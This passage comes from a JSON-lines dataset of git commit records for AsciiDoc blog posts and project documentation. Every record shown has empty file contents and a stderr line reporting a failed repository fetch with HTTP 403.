text\n","repos":"tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/05\/26\/hawkular-btm-booker-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/05\/26\/hawkular-btm-booker-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02245ff7b6c12eb4cf05a82c09da68d6f7280051","subject":"Update 2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","message":"Update 2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","new_file":"_posts\/2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15b1adae9d5d38c6c94ebfcb3470c05083c4f9a2","subject":"Create GettingStartedTutorial.adoc","message":"Create 
GettingStartedTutorial.adoc","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/GettingStartedTutorial.adoc","new_file":"doc\/GettingStartedTutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d9bc9dbc3ffe7b46f3891e3cf0dd23adcf4ea335","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d7a025948816088549a67c0d6cb94bc39ea24fb","subject":"Update 2017-06-18-El-apego-al-capital-como-obstaculo-para-crecer-Mas-Prospero-13.adoc","message":"Update 2017-06-18-El-apego-al-capital-como-obstaculo-para-crecer-Mas-Prospero-13.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-18-El-apego-al-capital-como-obstaculo-para-crecer-Mas-Prospero-13.adoc","new_file":"_posts\/2017-06-18-El-apego-al-capital-como-obstaculo-para-crecer-Mas-Prospero-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbd8a6fd23183b59bddef0c5938fee88b184a47f","subject":"2016-07-10-huh.adoc","message":"2016-07-10-huh.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-10-huh.adoc","new_file":"_posts\/2016-07-10-huh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4111a4dd4d7baf810dac072aecb4b0ce1f7e4c0","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba8c9a364f9cafd40d67bc31d2ad62dc8343dbfd","subject":"Update 2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","message":"Update 
2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","new_file":"_posts\/2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cae800dd54e193e5d9db4e37fb278f9146cca8a","subject":"y2b create post The New High Tech Corvette! (Corvette Performance Recorder - CES 2014)","message":"y2b create post The New High Tech Corvette! (Corvette Performance Recorder - CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-06-The-New-High-Tech-Corvette-Corvette-Performance-Recorder--CES-2014.adoc","new_file":"_posts\/2014-01-06-The-New-High-Tech-Corvette-Corvette-Performance-Recorder--CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7fa9f08dc92051b893814231b3ae519ed356672","subject":"Deleted 2016-6-26-first-title.adoc","message":"Deleted 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d8156e795d8af88560ccd6e8a572194ef5ca543","subject":"Publish 20161110-test-post.adoc","message":"Publish 20161110-test-post.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-test-post.adoc","new_file":"20161110-test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dbbd33eda5b0ebb92fbf2fdcc55591a614fe36b","subject":"Update 2015-04-22-Handy-Utils-for-fabric8.adoc","message":"Update 2015-04-22-Handy-Utils-for-fabric8.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-22-Handy-Utils-for-fabric8.adoc","new_file":"_posts\/2015-04-22-Handy-Utils-for-fabric8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed7babeed07f65bf4118f2bc4c8fb286a425a32d","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","message":"Update 
2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08832e7e64f11b80bfa729560210472edde869a6","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c4af0b1ef76114c0144e8de11b27d1d6d86243f","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae39e1a48ca1a8525d50c958087b7872124d0255","subject":"Publish 20161110-1232-showoff-zone-owo.adoc","message":"Publish 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone-owo.adoc","new_file":"20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46a886cd22e86d3fdfee62aa6115054138db3a33","subject":"[kudu-jepsen] added more info on troubleshooting","message":"[kudu-jepsen] added more info on troubleshooting\n\nAdded more information on distinguishing 'errors' from 'failures' in the\nkudu-jepsen test output.\n\nChange-Id: I9b97b744d969b73ede2fcb7a3509915b130c655b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6774\nTested-by: Kudu Jenkins\nReviewed-by: David Ribeiro Alves 
<dbbafdb4f25eb0c1ff3facf0e5f2f27705055af1@gmail.com>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"java\/kudu-jepsen\/README.adoc","new_file":"java\/kudu-jepsen\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d3be35397500d91648fc0961093ff21b3ad916b","subject":"Update 2015-08-30-I-suspect-that-Im-Happy.adoc","message":"Update 2015-08-30-I-suspect-that-Im-Happy.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-30-I-suspect-that-Im-Happy.adoc","new_file":"_posts\/2015-08-30-I-suspect-that-Im-Happy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f233aa3491e268211c67ec811a6332c817f3fb80","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d0a1119359134b1f6a70eef2531a9525329c2e2","subject":"y2b create post A Very Unusual Keyboard...","message":"y2b create post A Very Unusual Keyboard...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-19-A-Very-Unusual-Keyboard.adoc","new_file":"_posts\/2017-03-19-A-Very-Unusual-Keyboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc2943f77690d0dc8e8367c43f14849dd1a4d37b","subject":"Update 2018-01-01-Open-source-smart-watch.adoc","message":"Update 2018-01-01-Open-source-smart-watch.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2018-01-01-Open-source-smart-watch.adoc","new_file":"_posts\/2018-01-01-Open-source-smart-watch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6cc9c5683a3b5787cfb003f89c909ba76b57bd8","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81e282e52b30029ce6a2a951bd6a07939019d074","subject":"Renamed '_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc' to '_posts\/2017-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc'","message":"Renamed '_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc' to '_posts\/2017-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","new_file":"_posts\/2017-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"754ff3d889947d87262e97afdcff621686a9e5e1","subject":"Create Tutorials.adoc","message":"Create Tutorials.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/Tutorials.adoc","new_file":"wiki\/Tutorials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fca1fc846efde984144cddf246a725ffc8606a8","subject":"Update 2016-03-20-Bug.adoc","message":"Update 2016-03-20-Bug.adoc","repos":"indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io","old_file":"_posts\/2016-03-20-Bug.adoc","new_file":"_posts\/2016-03-20-Bug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/indusbox\/indusbox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55ca107f2d003c4333f26a7988c6786ac16e3dbb","subject":"CAMEL-13792 - Rename components to default names, Camel-rxjava2 to camel-rxjava - Regen","message":"CAMEL-13792 - Rename components to default names, Camel-rxjava2 to camel-rxjava - 
Regen\n","repos":"tdiesler\/camel,zregvart\/camel,adessaigne\/camel,zregvart\/camel,tdiesler\/camel,tdiesler\/camel,tdiesler\/camel,mcollovati\/camel,pmoerenhout\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,alvinkwekel\/camel,adessaigne\/camel,adessaigne\/camel,objectiser\/camel,DariusX\/camel,gnodet\/camel,ullgren\/camel,christophd\/camel,tdiesler\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,pax95\/camel,tadayosi\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,DariusX\/camel,ullgren\/camel,christophd\/camel,zregvart\/camel,tadayosi\/camel,mcollovati\/camel,christophd\/camel,objectiser\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pmoerenhout\/camel,DariusX\/camel,pax95\/camel,nicolaferraro\/camel,christophd\/camel,cunningt\/camel,CodeSmell\/camel,christophd\/camel,nikhilvibhav\/camel,apache\/camel,cunningt\/camel,pax95\/camel,CodeSmell\/camel,CodeSmell\/camel,nicolaferraro\/camel,ullgren\/camel,adessaigne\/camel,zregvart\/camel,apache\/camel,gnodet\/camel,pax95\/camel,CodeSmell\/camel,DariusX\/camel,ullgren\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,apache\/camel,objectiser\/camel,adessaigne\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,apache\/camel,gnodet\/camel,cunningt\/camel,pmoerenhout\/camel,gnodet\/camel,alvinkwekel\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,objectiser\/camel,tadayosi\/camel,pmoerenhout\/camel,cunningt\/camel,nikhilvibhav\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/rxjava.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/rxjava.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b07b31f7777c5d146c94efaeadc5c12377c64317","subject":"Update 2017-02-14-Test-post.adoc","message":"Update 2017-02-14-Test-post.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-14-Test-post.adoc","new_file":"_posts\/2017-02-14-Test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"330c20a733896bcacf421541fe72f26bb29998f5","subject":"Update 2017-05-16-IDE-IDE-2.adoc","message":"Update 2017-05-16-IDE-IDE-2.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16-IDE-IDE-2.adoc","new_file":"_posts\/2017-05-16-IDE-IDE-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e301aa7b0b5d8ddac15512acbe2c53a089b93e9e","subject":"Update 2015-06-09-Hola-EdMundo.adoc","message":"Update 2015-06-09-Hola-EdMundo.adoc","repos":"nectia-think\/nectia-think.github.io,nectia-think\/nectia-think.github.io,nectia-think\/nectia-think.github.io","old_file":"_posts\/2015-06-09-Hola-EdMundo.adoc","new_file":"_posts\/2015-06-09-Hola-EdMundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nectia-think\/nectia-think.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"97bd4534819f3af5668efebd6ac3ffea9e9f5d4b","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8d370d24e08364c6c603302e800cd4372e1354a","subject":"Deleted 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Deleted 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c17b27c43a3de6ceb8b07618cd89136f9d6e8ac7","subject":"Add a post spotlighting continuous build","message":"Add a post spotlighting continuous build\n","repos":"raelik\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin","old_file":"docs\/news\/2015-09-01-using-newer-gradle-features.adoc","new_file":"docs\/news\/2015-09-01-using-newer-gradle-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raelik\/jruby-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d3da0f48696969c0293671275f2aca1918b2ca5","subject":"Add skeleton for secrets doc","message":"Add skeleton for secrets doc\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"dev_guide\/secrets.adoc","new_file":"dev_guide\/secrets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9699febf9701bfe1b9fc64957a492c342a656173","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"305131ff1b3e1350d4a2567c47e8ff41d74f51e9","subject":"some minimal CliBuilder doco","message":"some minimal CliBuilder 
doco\n","repos":"shils\/incubator-groovy,armsargis\/groovy,paulk-asert\/groovy,apache\/groovy,graemerocher\/incubator-groovy,dpolivaev\/groovy,jwagenleitner\/groovy,armsargis\/groovy,graemerocher\/incubator-groovy,bsideup\/incubator-groovy,shils\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/groovy,apache\/incubator-groovy,dpolivaev\/groovy,tkruse\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/incubator-groovy,alien11689\/incubator-groovy,paulk-asert\/groovy,shils\/groovy,avafanasiev\/groovy,shils\/groovy,alien11689\/incubator-groovy,jwagenleitner\/incubator-groovy,russel\/groovy,apache\/groovy,russel\/groovy,russel\/groovy,shils\/incubator-groovy,russel\/incubator-groovy,tkruse\/incubator-groovy,dpolivaev\/groovy,paulk-asert\/groovy,avafanasiev\/groovy,avafanasiev\/groovy,armsargis\/groovy,tkruse\/incubator-groovy,armsargis\/groovy,jwagenleitner\/incubator-groovy,shils\/groovy,graemerocher\/incubator-groovy,bsideup\/incubator-groovy,graemerocher\/incubator-groovy,fpavageau\/groovy,traneHead\/groovy-core,alien11689\/incubator-groovy,dpolivaev\/groovy,russel\/groovy,apache\/groovy,shils\/groovy,apache\/incubator-groovy,jwagenleitner\/groovy,apache\/incubator-groovy,fpavageau\/groovy,paulk-asert\/incubator-groovy,paulk-asert\/groovy,fpavageau\/groovy,bsideup\/incubator-groovy,russel\/incubator-groovy,apache\/incubator-groovy,apache\/groovy,tkruse\/incubator-groovy,bsideup\/incubator-groovy,shils\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,alien11689\/incubator-groovy,traneHead\/groovy-core,russel\/incubator-groovy,russel\/incubator-groovy,traneHead\/groovy-core,avafanasiev\/groovy,paulk-asert\/incubator-groovy,fpavageau\/groovy,jwagenleitner\/groovy","old_file":"src\/spec\/doc\/core-domain-specific-languages.adoc","new_file":"src\/spec\/doc\/core-domain-specific-languages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/armsargis\/groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7278e8e3d1a11274df4d498a7b771f4b67da4253","subject":"Create do-always-respond-es.adoc","message":"Create do-always-respond-es.adoc\n\nSpanish translation for do-always-respond.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-always-respond-es.adoc","new_file":"src\/do\/do-always-respond-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4c23b200a20e42702bedefa35aae2a4dcec493","subject":"Update 2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","message":"Update 2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","new_file":"_posts\/2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"983fdb9082ad694a5f5d7295bc24f7f03fbde047","subject":"Add common-gradle snippet","message":"Add 
